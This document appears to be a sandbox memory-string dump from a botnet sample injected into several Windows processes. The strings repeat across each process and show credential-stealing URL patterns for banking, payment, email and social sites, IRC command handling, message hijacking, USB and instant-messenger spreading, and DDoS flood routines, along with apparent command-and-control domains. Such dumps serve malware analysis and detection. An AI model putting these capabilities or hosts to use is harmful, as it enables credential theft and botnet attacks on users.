"%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>mscorsvw.exe_424_rwx_008D0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>jqs.exe_480_rwx_010C0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%Program Files%\Java\jre6\bin\jqs.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\Program Files\Java\jre6\bin\jqs.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>csrss.exe_692_rwx_012D0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0.</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</p